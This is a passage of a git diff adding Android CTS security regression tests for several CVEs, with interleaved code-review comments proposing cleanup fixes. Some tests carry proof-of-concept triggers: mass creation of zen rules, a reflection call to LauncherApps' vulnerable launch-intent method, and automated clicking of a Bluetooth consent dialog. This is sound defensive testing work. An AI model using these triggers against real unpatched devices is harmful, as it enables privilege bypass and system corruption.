-import static org.junit.Assume.assumeTrue;
-
-import android.app.AutomaticZenRule;
-import android.app.Instrumentation;
-import android.app.NotificationManager;
-import android.app.UiAutomation;
-import android.content.ComponentName;
-import android.content.Context;
-import android.net.Uri;
-import android.platform.test.annotations.AsbSecurityTest;
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import java.util.ArrayList;
-
-@RunWith(AndroidJUnit4.class)
-public class CVE_2022_20143 extends StsExtraBusinessLogicTestCase {
-
- @AsbSecurityTest(cveBugId = 220735360)
- @Test
- public void testPocCVE_2022_20143() {
- final int ruleLimitPerPackage = 200;
- final int timeoutDuration = 5000;
- final int waitDuration = 100;
- Instrumentation instrumentation;
- Context context;
- NotificationManager notificationManager = null;
- String packageName = null;
- UiAutomation uiautomation = null;
- boolean isVulnerable = true;
- boolean notificationPolicyAccessGranted = false;
- int automaticZenRules = 0;
- ArrayList<String> ruleIds = new ArrayList<>();
- try {
- instrumentation = InstrumentationRegistry.getInstrumentation();
- context = instrumentation.getContext();
- notificationManager = context.getSystemService(NotificationManager.class);
- packageName = context.getPackageName();
- uiautomation = instrumentation.getUiAutomation();
- uiautomation.executeShellCommand("cmd notification allow_dnd " + packageName);
- long startTime = System.currentTimeMillis();
- while (System.currentTimeMillis() - startTime < timeoutDuration) {
- // busy wait until notification policy access is granted
- if (notificationManager.isNotificationPolicyAccessGranted()) {
- notificationPolicyAccessGranted = true;
- break;
- }
- Thread.sleep(waitDuration);
- }
- // storing the number of automaticZenRules present before test run
- automaticZenRules = notificationManager.getAutomaticZenRules().size();
- ComponentName component =
- new ComponentName(packageName, PocActivity.class.getCanonicalName());
- for (int i = 0; i < ruleLimitPerPackage; ++i) {
- Uri conditionId = Uri.parse("condition://android/" + i);
- AutomaticZenRule rule = new AutomaticZenRule("ZenRuleName" + i, null, component,
- conditionId, null, NotificationManager.INTERRUPTION_FILTER_ALL, true);
- String id = notificationManager.addAutomaticZenRule(rule);
- ruleIds.add(id);
- }
- } catch (Exception e) {
- if (e instanceof IllegalArgumentException) {
- isVulnerable = false; // expected with fix
- } else {
- assumeNoException(e);
- }
- } finally {
- try {
- if (notificationPolicyAccessGranted) {
- /* retrieving the total number of automaticZenRules added by test so that the */
- /* test fails only if all automaticZenRules were added successfully */
- automaticZenRules =
- notificationManager.getAutomaticZenRules().size() - automaticZenRules;
- for (String id : ruleIds) {
- notificationManager.removeAutomaticZenRule(id);
- }
- uiautomation
- .executeShellCommand("cmd notification disallow_dnd " + packageName);
- }
- boolean allZenRulesAdded = ruleLimitPerPackage == automaticZenRules;
- assumeTrue("Notification policy access not granted",
- notificationPolicyAccessGranted);
- assertFalse(
- "Vulnerable to b/220735360!! System can be corrupted by adding many"
- + " AutomaticZenRules via NotificationManager#addAutomaticZenRule",
- isVulnerable && allZenRulesAdded);
- } catch (Exception e) {
- assumeNoException(e);
- }
- }
- }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20234.java b/tests/tests/security/src/android/security/cts/CVE_2022_20234.java
new file mode 100644
index 0000000..8d65cdb
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20234.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20234 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 225189301)
+ @Test
+ public void testPocCVE_2022_20234() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager pm = context.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assume().withMessage("Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing")
+ .that(pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE))
+ .isTrue();
+
+ // With fix, NotificationAccessConfirmationActivity is not exported
+ final String activityName = ".notifications.NotificationAccessConfirmationActivity";
+ final String pkgName = "com.android.car.settings";
+ ComponentName component = new ComponentName(pkgName, pkgName + activityName);
+ boolean exported = pm.getActivityInfo(component, 0 /* flags */).exported;
+ assertWithMessage(
+ "Vulnerable to b/225189301!! "
+ + pkgName
+ + activityName
+ + "can be started from outside system process")
+ .that(exported)
+ .isFalse();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
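Review bot: The failure message in `assertWithMessage(...)` joins `activityName` directly to `"can be started from outside system process"`, so the report reads `...NotificationAccessConfirmationActivitycan be started...`; the literal needs a leading space, `+ " can be started from outside system process")`. The same slip is in CVE_2023_20927.java in this change, where `"Vulnerable to b/244216503!"` is followed directly by the permission list. Separately, a `NameNotFoundException` from `getActivityInfo` becomes a skip through `assumeNoException(e)`; if that is intended for builds without the activity, a comment such as `// Activity absent on this build: nothing to verify, skip` on the catch would say so.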
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java b/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java
new file mode 100644
index 0000000..7c3b7de
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20429;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothDevicePicker;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.security.cts.R;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20429 extends StsExtraBusinessLogicTestCase {
+ private BroadcastReceiver mBroadcastReceiver;
+ private Context mContext;
+ private Semaphore mBroadcastReceived;
+ private String mErrorMessage;
+ private UiAutomation mUiAutomation;
+ private boolean mBtState;
+ private int mStatusCode;
+
+ @AsbSecurityTest(cveBugId = 220741473)
+ @Test
+ public void testPocCVE_2022_20429() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ mContext = instrumentation.getContext();
+ PackageManager pm = mContext.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ mContext.getString(
+ R.string.cve_2022_20429_featureMissing,
+ PackageManager.FEATURE_AUTOMOTIVE),
+ pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+ // Skip test if bluetooth feature not available
+ assumeTrue(
+ mContext.getString(
+ R.string.cve_2022_20429_featureMissing,
+ PackageManager.FEATURE_BLUETOOTH),
+ pm.hasSystemFeature(PackageManager.FEATURE_BLUETOOTH));
+ mBroadcastReceived = new Semaphore(0);
+ mBtState = false;
+ mErrorMessage = "";
+ mStatusCode = getInteger(R.integer.cve_2022_20429_failure);
+ mUiAutomation = instrumentation.getUiAutomation();
+ mUiAutomation.adoptShellPermissionIdentity();
+
+ // Register BroadcastReceiver to receive status from PocActivity
+ mBroadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context mContext, Intent intent) {
+ try {
+ if (intent.getAction()
+ .equals(
+ mContext.getString(
+ R.string.cve_2022_20429_broadcastAction))) {
+ mStatusCode =
+ intent.getIntExtra(
+ mContext.getString(
+ R.string.cve_2022_20429_resultKey),
+ getInteger(R.integer.cve_2022_20429_failure));
+ mErrorMessage =
+ intent.getStringExtra(
+ mContext.getString(
+ R.string.cve_2022_20429_messageKey));
+ mBroadcastReceived.release();
+ } else if (intent.getAction()
+ .equals(BluetoothAdapter.ACTION_SCAN_MODE_CHANGED)
+ && intent.getIntExtra(
+ BluetoothAdapter.EXTRA_SCAN_MODE,
+ BluetoothAdapter.ERROR)
+ == BluetoothAdapter
+ .SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+ mBroadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // Ignore exceptions here
+ }
+ }
+ };
+ IntentFilter filter = new IntentFilter();
+ filter.addAction(mContext.getString(R.string.cve_2022_20429_broadcastAction));
+ filter.addAction(BluetoothAdapter.ACTION_SCAN_MODE_CHANGED);
+ mContext.registerReceiver(mBroadcastReceiver, filter);
+ BluetoothAdapter btAdapter = BluetoothAdapter.getDefaultAdapter();
+
+ // Save the state of bluetooth adapter to reset after the test
+ mBtState = btAdapter.isEnabled();
+
+ // Disable bluetooth if already enabled in 'SCAN_MODE_CONNECTABLE_DISCOVERABLE' mode
+ if (btAdapter.getScanMode() == BluetoothAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+ }
+
+ // Enable bluetooth if in disabled state
+ if (!btAdapter.isEnabled()) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_ENABLE);
+ }
+ mContext.startActivity(
+ new Intent(BluetoothDevicePicker.ACTION_LAUNCH)
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ mBroadcastReceived.tryAcquire(
+ getInteger(R.integer.cve_2022_20429_timeoutMs), TimeUnit.MILLISECONDS);
+
+ // Test fails if Bluetooth Scan mode changes to SCAN_MODE_CONNECTABLE_DISCOVERABLE
+ assertFalse(
+ mContext.getString(R.string.cve_2022_20429_failMsg),
+ btAdapter.getScanMode() == BluetoothAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // Disable bluetooth if it was OFF before the test
+ if (!mBtState) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+ }
+ mUiAutomation.dropShellPermissionIdentity();
+ } catch (Exception e) {
+ // Ignore exceptions here
+ }
+ }
+ }
+
+ int getInteger(int resId) {
+ return mContext.getResources().getInteger(resId);
+ }
+
+ private void switchBluetoothMode(String action) throws Exception {
+ // Start PocActivity to switch bluetooth mode
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(mContext.getString(R.string.cve_2022_20429_btAction), action);
+ mContext.startActivity(intent);
+
+ // Wait until bluetooth mode switch is completed successfully
+ assumeTrue(
+ mBroadcastReceived.tryAcquire(
+ getInteger(R.integer.cve_2022_20429_timeoutMs), TimeUnit.MILLISECONDS));
+ assumeTrue(mErrorMessage, mStatusCode != getInteger(R.integer.cve_2022_20429_failure));
+ }
+}
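Review bot: The `finally` block runs its Bluetooth restore even when setup never happened: if either `assumeTrue` feature check fails, `mBtState` is still `false`, so `switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE)` starts PocActivity on a device the test meant to skip, and the resulting exception is swallowed. Because `mUiAutomation.dropShellPermissionIdentity()` sits after that call in the same `try`, any failure in the restore also leaves the shell permission identity adopted for later tests. The receiver passed to `mContext.registerReceiver(...)` is never unregistered. The cleanup below separates the three steps and guards each one; `mBtStateSaved` is a new boolean field, set right after `mBtState = btAdapter.isEnabled()`.

```java
        } finally {
            // Restore Bluetooth only when its original state was actually recorded
            if (mBtStateSaved && !mBtState) {
                try {
                    switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
                } catch (Exception ignored) {
                    // Best-effort restore; must not block the cleanup below
                }
            }
            if (mBroadcastReceiver != null) {
                try {
                    mContext.unregisterReceiver(mBroadcastReceiver);
                } catch (Exception ignored) {
                    // Receiver was created but never registered
                }
            }
            // Always give back the shell identity, whatever happened above
            if (mUiAutomation != null) {
                mUiAutomation.dropShellPermissionIdentity();
            }
        }
```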
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java
new file mode 100644
index 0000000..7883455
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20429;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import android.app.Activity;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothManager;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.security.cts.R;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.Until;
+
+import java.util.regex.Pattern;
+
+public class PocActivity extends Activity {
+
+ int getInteger(int resId) {
+ return getResources().getInteger(resId);
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ try {
+ String action = getIntent().getStringExtra(getString(R.string.cve_2022_20429_btAction));
+ int code = getInteger(R.integer.cve_2022_20429_enable);
+ if (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)) {
+ code = getInteger(R.integer.cve_2022_20429_disable);
+ }
+ BluetoothManager bluetoothManager = getSystemService(BluetoothManager.class);
+ BluetoothAdapter bluetoothAdapter = bluetoothManager.getAdapter();
+ if ((action.equals(BluetoothAdapter.ACTION_REQUEST_ENABLE)
+ && !bluetoothAdapter.isEnabled())
+ || (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)
+ && bluetoothAdapter.isEnabled())) {
+ Intent btIntent = new Intent(action);
+ startActivityForResult(btIntent, code);
+
+ // Wait for the 'Allow' button
+ String settingsPackageName =
+ getString(R.string.cve_2022_20429_carSettingsPackageName);
+ Resources settingsRes =
+ getPackageManager().getResourcesForApplication(settingsPackageName);
+ int resIdentifier =
+ settingsRes.getIdentifier(
+ getString(R.string.cve_2022_20429_allowButtonResKey),
+ getString(R.string.cve_2022_20429_resType),
+ settingsPackageName);
+ String allowButtonText = settingsRes.getString(resIdentifier);
+ Pattern textPattern = Pattern.compile(allowButtonText, Pattern.CASE_INSENSITIVE);
+ BySelector selector = By.text(textPattern);
+ UiDevice uiDevice = UiDevice.getInstance(getInstrumentation());
+ uiDevice.wait(
+ Until.hasObject(selector), getInteger(R.integer.cve_2022_20429_timeoutMs));
+
+ // Click on the 'Allow' button to enable bluetooth as required by test
+ UiObject2 uiObject = uiDevice.findObject(selector);
+ uiObject.click();
+ } else {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_success), "");
+ }
+ } catch (Exception e) {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_failure), e.getMessage());
+ }
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ try {
+ if (requestCode == getInteger(R.integer.cve_2022_20429_enable)
+ && resultCode == Activity.RESULT_OK) {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_enable), "");
+ } else if (requestCode == getInteger(R.integer.cve_2022_20429_disable)
+ && resultCode == Activity.RESULT_OK) {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_disable), "");
+ }
+ } catch (Exception e) {
+ // Ignore exception here
+ }
+ }
+
+ void sendTestResult(int result, String message) {
+ try {
+ Intent intent = new Intent(getString(R.string.cve_2022_20429_broadcastAction));
+ intent.putExtra(getString(R.string.cve_2022_20429_resultKey), result);
+ intent.putExtra(getString(R.string.cve_2022_20429_messageKey), message);
+ sendBroadcast(intent);
+ finish();
+ } catch (Exception e) {
+ // Ignore exception here
+ }
+ }
+}
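Review bot: In `onResume()` the result of `uiDevice.wait(Until.hasObject(selector), ...)` is dropped and `uiDevice.findObject(selector)` is dereferenced unconditionally, so a consent dialog that never appears ends as a `NullPointerException` whose `getMessage()` becomes the skip reason the test reports. Checking the object first gives a usable reason, e.g. `if (uiObject == null) { sendTestResult(getInteger(R.integer.cve_2022_20429_failure), "Allow button not found"); return; }`. The button label read from the Settings resources is also compiled as a regular expression as-is; `Pattern.compile(Pattern.quote(allowButtonText), Pattern.CASE_INSENSITIVE)` keeps a label containing characters such as `(` or `.` from changing what is matched.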
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java b/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java
new file mode 100644
index 0000000..6536e8a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20916;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.PendingIntent;
+import android.content.BroadcastReceiver;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.LauncherApps;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+import android.os.Process;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Method;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20916 extends StsExtraBusinessLogicTestCase {
+ private static final long TIMEOUT_MS = 10_000L;
+
+ // b/229256049
+ // Vulnerable library : services.jar, framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 229256049)
+ @Test
+ public void testPocCVE_2023_20916() {
+ try {
+ // Ensure that the test app does not have the ACCESS_SHORTCUTS permission
+ Context context = getApplicationContext();
+ assumeFalse("The test requires the app to not have the ACCESS_SHORTCUTS permission",
+ context.checkPermission(android.Manifest.permission.ACCESS_SHORTCUTS,
+ Process.myPid(), Process.myUid()) == PackageManager.PERMISSION_GRANTED);
+
+ // Make a call to the vulnerable function getMainActivityLaunchIntent()
+ Method method = LauncherApps.class.getMethod("getMainActivityLaunchIntent",
+ ComponentName.class, Bundle.class, UserHandle.class);
+ PendingIntent pi =
+ (PendingIntent) method.invoke(context.getSystemService(LauncherApps.class),
+ new ComponentName(context, PocActivity.class), null,
+ UserHandle.getUserHandleForUid(Process.myUid()));
+
+ // Register a broadcast receiver to receive broadcast from PocActivity indicating
+ // presence of vulnerability
+ final Semaphore broadcastReceived = new Semaphore(0);
+ final String bcastAction = "CVE_2023_20916_action";
+ BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if (intent.getAction().equals(bcastAction)) {
+ broadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter = new IntentFilter(bcastAction);
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Attempt to launch the PocActivity using the pending intent received by calling
+ // getMainActivityLaunchIntent()
+ context.startIntentSender(pi.getIntentSender(), null, 0, 0, 0, null);
+
+ // On vulnerable device, PocActivity is successfully launched using
+ // LauncherAppsService#getActivityLaunchIntent and sends a broadcast, if it is received
+ // successfully, the test fails.
+ assertFalse("Device is vulnerable to b/229256049 !!",
+ broadcastReceived.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ try {
+ if (e.getCause() instanceof SecurityException && e.getCause().getMessage()
+ .contains("Caller can't access shortcut information")) {
+ // this exception is thrown with fix so ignoring it
+ return;
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ assumeNoException(e);
+ }
+ }
+}
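Review bot: The receiver registered with `context.registerReceiver(broadcastReceiver, filter)` is never unregistered and listens for an implicit broadcast with a fixed action string, so, as far as this hunk shows, any package that sends `CVE_2023_20916_action` during the 10 s wait makes the test report the device as vulnerable. Where the test's SDK level allows it, registering with `Context.RECEIVER_NOT_EXPORTED` and having PocActivity call `setPackage(getPackageName())` on its intent limits the signal to this APK, and a `finally` calling `context.unregisterReceiver(broadcastReceiver)` stops the receiver outliving the test. The fixed-build path also depends on the exact text `"Caller can't access shortcut information"`; a `SecurityException` with different wording turns into a skip, which deserves a comment next to that check.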
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java
new file mode 100644
index 0000000..4953c20
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20916;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+
+ // PocActivity has been launched successfully, this indicates presence of vulnerability
+ // so broadcasting it to DeviceTest.
+ sendBroadcast(new Intent("CVE_2023_20916_action"));
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+}
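Review bot: `onCreate()` sends the broadcast and then leaves the activity on screen; on a device where the launch succeeds nothing finishes it, so it stays in the foreground for whatever test runs next. Adding `finish();` right after `sendBroadcast(...)` fixes that. The comment says the broadcast goes to "DeviceTest", but the receiver in this change lives in `CVE_2023_20916`; `// so broadcasting it to CVE_2023_20916#testPocCVE_2023_20916.` would match the code.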
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20927.java b/tests/tests/security/src/android/security/cts/CVE_2023_20927.java
new file mode 100644
index 0000000..8b9f494
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20927.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.pm.PackageInfo;
+import android.content.pm.PackageManager;
+import android.content.pm.PermissionInfo;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20927 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 244216503)
+ @Test
+ public void testPocCVE_2023_20927() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager pm = context.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ "Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing",
+ pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+ // Permissions added in com.android.car package as a part of the fix
+ List<String> missingPermissions = new ArrayList<String>();
+ missingPermissions.add("android.car.permission.BIND_PROJECTION_SERVICE");
+ missingPermissions.add("android.car.permission.BIND_VMS_CLIENT");
+ missingPermissions.add(
+ "android.car.permission.BIND_INSTRUMENT_CLUSTER_RENDERER_SERVICE");
+ missingPermissions.add("android.car.permission.BIND_CAR_INPUT_SERVICE");
+
+ // Fetch the permission of com.android.car package
+ final String pkgName = "com.android.car";
+ PackageInfo info = pm.getPackageInfo(pkgName, PackageManager.GET_PERMISSIONS);
+ assumeTrue(
+ "Package info for " + pkgName + " not fetched properly!! ",
+ info.packageName.equals(pkgName) && info.coreApp);
+ PermissionInfo[] permissionArray = info.permissions;
+ if (permissionArray != null) {
+ for (PermissionInfo perm : permissionArray) {
+ if (missingPermissions.contains(perm.name)) {
+ missingPermissions.remove(perm.name);
+ }
+ }
+ }
+
+ // Fail if any of the 4 permissions is missing
+ assertTrue(
+ "Vulnerable to b/244216503!"
+ + missingPermissions.toString()
+ + " missing in"
+ + " CarService.apk",
+ missingPermissions.size() == 0);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
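Review bot: The permission loop and the final check can be written more directly: `List.remove(Object)` is already a no-op for an absent element, so the guard `if (missingPermissions.contains(perm.name))` is redundant, and `missingPermissions.size() == 0` reads better as `missingPermissions.isEmpty()`. `new ArrayList<String>()` can use the diamond form, `new ArrayList<>()`. A short comment above `assumeTrue(... info.coreApp)` explaining why a non-core `com.android.car` package is skipped rather than failed would help the next reader.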
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20960.java b/tests/tests/security/src/android/security/cts/CVE_2023_20960.java
new file mode 100644
index 0000000..88d6e69
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20960.java
@@ -0,0 +1,129 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.provider.Settings;
+import android.support.test.uiautomator.UiDevice;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20960 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 250589026)
+ @Test
+ public void testPocCVE_2023_20960() {
+ UiAutomation uiAutomation = null;
+ UiDevice uiDevice = null;
+ try {
